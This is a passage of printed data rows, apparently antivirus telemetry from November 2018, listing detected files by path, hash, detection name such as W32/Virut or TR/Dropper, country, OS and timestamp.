  Row(detection=Row(filename='avscan-20181101-124051-53cdee6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124030-41F23286\\AVSCAN-20181101-124051-53CDEE6A', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:40:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124216-9cb42619', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124154-89D16AE6\\AVSCAN-20181101-124216-9CB42619', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:42:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121021-3a4cb869', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-120959-27BEEFD0\\AVSCAN-20181101-121021-3A4CB869', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-131629-74ad4ebc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-131529-41BE397F\\AVSCAN-20181101-131629-74AD4EBC', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:16:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-125019-3911887f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124957-25BEA3A1\\AVSCAN-20181101-125019-3911887F', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:50:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-125047-50b6f758', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-125025-3DB8672E\\AVSCAN-20181101-125047-50B6F758', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:50:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124023-3c1e511c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124002-2A081859\\AVSCAN-20181101-124023-3C1E511C', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:40:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124147-844d8398', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124126-71F36FB4\\AVSCAN-20181101-124147-844D8398', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:41:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121340-e46e2a03', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-121306-C7532665\\AVSCAN-20181101-121340-E46E2A03', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:13:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smartbar.communication.dll', filepath='C:\\Program Files\\lpt\\smartbar.communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:04:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122530-41cff98f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122457-25EE9C0F\\AVSCAN-20181101-122530-41CFF98F', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:25:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123900-f5884f4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123837-E2120AA3\\AVSCAN-20181101-123900-F5884F4F', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:39:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124119-6c24441a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124058-59D8E978\\AVSCAN-20181101-124119-6C24441A', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:41:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123702-90c1bff9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123642-7FF2C2DB\\AVSCAN-20181101-123702-90C1BFF9', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:37:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123732-aa747c6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123711-9808F33D\\AVSCAN-20181101-123732-AA747C6C', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:37:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123804-c5739c21', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123739-B01DD1C4\\AVSCAN-20181101-123804-C5739C21', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:38:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124439-16e1a676', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124419-05628A42\\AVSCAN-20181101-124439-16E1A676', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:44:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122906-fa8a21fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122844-E7964DE6\\AVSCAN-20181101-122906-FA8A21FD', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:29:07Z'), dt=datetime.date(2018, 11, 1)),
  ...],
 [Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T12:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:00:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T10:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T18:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='854a52e5c13cc677924779e3bc483154709e618e25c5cf47fc0ab6e3d25c1040', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='856be68c7c35950ec82cb025ae25eda6d534bd29b349cedcab036dfa22c3d18e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\856BE68C7C35950EC82CB025AE25EDA6D534BD29B349CEDCAB036DFA22C3D18E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='856be68c7c35950ec82cb025ae25eda6d534bd29b349cedcab036dfa22c3d18e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:15:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mszqbtp.exe', filepath='C:\\ProgramData\\mszqbtp.exe', filesize=102800000, name='WORM/Lodbak.Gen.#M300.#R7829'), hash='857e42267b1f1c2b7ad0c9b55da324f70718cf4e6060c59d6f488033a0ade108', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T05:36:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='85aa8063c3ca004474b40dce5c7a8fefae1d6701970c061fdd7693db4b0e424f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\85AA8063C3CA004474B40DCE5C7A8FEFAE1D6701970C061FDD7693DB4B0E424F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='85aa8063c3ca004474b40dce5c7a8fefae1d6701970c061fdd7693db4b0e424f', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:15:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smartbar.communication.dll', filepath='C:\\Users\\X\\AppData\\Local\\Smartbar\\Application\\Smartbar.Communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='85b2a4f1594c8b1c4b5899805517daf76fdf97ae31efe7caf45408440e785652', metadata=Row(cmdline=None, country='SE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:51:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='zbaymwct.exe', filepath='I:\\RECYCLER_DETEC\\S-6-6-57-2067840111-7214750817-811023153-6264\\ZbaYmWCt.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='85b5ed79c450aa6b5ec8dfb19944d48f7ba5e0dd5faf2b708492663cc441364e', metadata=Row(cmdline='\\\\\\"I:\\\\\\\\\\\\\\" ', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T08:16:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=6912000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='8605250801f13c10538a35dd8909965043b6aeb907d1870f0f7324bab3f44db2', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T18:46:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='conquer.exe', filepath='\\?\\J:\\العاب2\\Diamond Mine\\data\\{عربيات\\PlayConquer\\PlayConquer\\Conquer.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='86068ba1095bb6115f1b15cd7808d724057a244afd7e9bc4d4737099497a844d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:07:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='45b5cd46-e8fa-c91b-f015-ed71d99e6247.exe', filepath='H:\\{dc86b55d-9ce5-6da4-cd3b-f479b33f70f9}\\45b5cd46-e8fa-c91b-f015-ed71d99e6247.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='864c5147eb1d46a675ca2064414e42ddd8bd55da363d9321ccf58480954c6bec', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T13:01:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='45b5cd46-e8fa-c91b-f015-ed71d99e6247.exe', filepath='H:\\{dc86b55d-9ce5-6da4-cd3b-f479b33f70f9}\\45b5cd46-e8fa-c91b-f015-ed71d99e6247.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='864c5147eb1d46a675ca2064414e42ddd8bd55da363d9321ccf58480954c6bec', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T13:01:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mfl_vc9.dll', filepath='C:\\Program Files (x86)\\MAGIX\\Audio Cleaning Lab 2016\\VideoExportMaker\\MFL_VC9.dll', filesize=772000, name='W32/Ramnit.C.#M1.#R1'), hash='8699632edbbbe3aa5850325e8192e7597af1ec7d087dde65a7eb592dc508444f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-01T16:39:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mfl_vc9.dll', filepath='C:\\Program Files (x86)\\MAGIX\\Audio Cleaning Lab 2016\\VideoExportMaker\\MFL_VC9.dll', filesize=772000, name='W32/Ramnit.C.#M1.#R1'), hash='8699632edbbbe3aa5850325e8192e7597af1ec7d087dde65a7eb592dc508444f', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T19:30:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='86a7b4901bb5fbbcd40d7730584acd0c814247b1160262715180ddac60d83142', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\86A7B4901BB5FBBCD40D7730584ACD0C814247B1160262715180DDAC60D83142', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='86a7b4901bb5fbbcd40d7730584acd0c814247b1160262715180ddac60d83142', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:08:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='86bb0cdf3416b387a6e04679de5347aa754108e5425efc93c1868069806f5cda', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='62nkb2wm.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Low\\62nkb2wm.exe', filesize=128000, name='HEUR/AGEN.1035695.#M1.#R1'), hash='87360561a5460d89112d64b3826081504b230c64f9f43eeac66157b4d0c341ed', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:50:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00004d88', filepath='C:\\Windows\\Temp\\tmp00001cb6\\tmp00004d88', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='873b1c6fd4b093480ca160808ed97c16b73037fbd969c21105c509be89503510', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T16:29:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rlistupdater', filepath='/Volumes/backup/Backups.backupdb/MacBook Pro de erly wilson/2017-09-12-235335/Erly W/Users/erlywilson/Library/Application Support/amc/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='BR', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rlistupdater', filepath='/Volumes/backup/Backups.backupdb/MacBook Pro de erly wilson/2017-09-12-235335/Erly W/Users/erlywilson/Library/Application Support/amc/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='BR', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rlistupdater', filepath='/Users/schneider/Library/Application Support/amc/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T05:44:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rlistupdater', filepath='/private/var/folders/1s/fbj98h4s57504rj7tl8czrxr0000gn/T/com.blacey.SuperDuper/DD0AE88E-61EA-4028-8B3C-D1545D6D4268/snapshot/Users/neil/Library/Application Support/amc/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:23:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rlistupdater', filepath='/Applications/Advanced Mac Cleaner.app/Contents/Resources/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='17', os_vminor='4', parentproc=None, parentsize=None, timestamp='2018-11-01T23:21:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000c6b1', filepath='C:\\Windows\\Temp\\b75cc136-7be7-4861-a0a2-9edfdaaf085f\\tmp0000056b\\tmp0000c6b1', filesize=17088000, name='TR/Crypt.XPACK.Gen.#M300.#R2389'), hash='87935d1eed5d0d8015f92a7efeae8d7210a11e2d63295fa649acd618aaf7db89', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-01T12:02:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172043-c2687a2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-171731-A569503C\\AVSCAN-20181101-172043-C2687A2C', filesize=64000, name='W97M/Agent.2975818.#M1.#R1'), hash='87fb85fb2421077d090f6fc9944070bc3b9c60eb5249cff09fd7e6ce8be4fa17', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:20:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rwzskoa', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RWZSKOA', filesize=64000, name='W97M/Agent.2975818.#M1.#R1'), hash='87fb85fb2421077d090f6fc9944070bc3b9c60eb5249cff09fd7e6ce8be4fa17', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:16:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='video.exe', filepath='E:\\school\\Local\\utq\\การงานเทคโน\\video2\\video\\video.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='882908ebed229ab755cc69210a7b40c89c9d287ed6bcca05ff8b0143a2873383', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='107_fuji.exe', filepath='E:\\picture\\summer\\107_FUJI\\107_FUJI.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='887d290e53469b0d5ae11733ae63d6f3c9b7fcc382bb8f5fb8c340e547b5e9aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:15:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150249-7115d71c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5e1c00c\\AVSCAN-20181101-150142-63076B81\\AVSCAN-20181101-150249-7115D71C', filesize=64000, name='TR/Dropper.Gen.#M300.#R1736'), hash='887e1ab2eaf3228bd8b604427b4510bc8c5dd50748e04fbb7eb539371fe310d0', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:02:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150211-6911626a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5e1c00c\\AVSCAN-20181101-150142-63076B81\\AVSCAN-20181101-150211-6911626A', filesize=64000, name='TR/Dropper.Gen.#M300.#R1736'), hash='887e1ab2eaf3228bd8b604427b4510bc8c5dd50748e04fbb7eb539371fe310d0', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:02:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='remselec203trial.exe', filepath='E:\\Video- Foto\\DVD\\Remote Selector - 2.0.3\\REMSELEC203TRIAL.EXE', filesize=64000, name='TR/Dropper.Gen.#M300.#R1736'), hash='887e1ab2eaf3228bd8b604427b4510bc8c5dd50748e04fbb7eb539371fe310d0', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Gentibus CD\\GentibusCD.exe', parentsize=1638400, timestamp='2018-11-01T13:05:42Z'), dt=datetime.date(2018, 11, 1)),
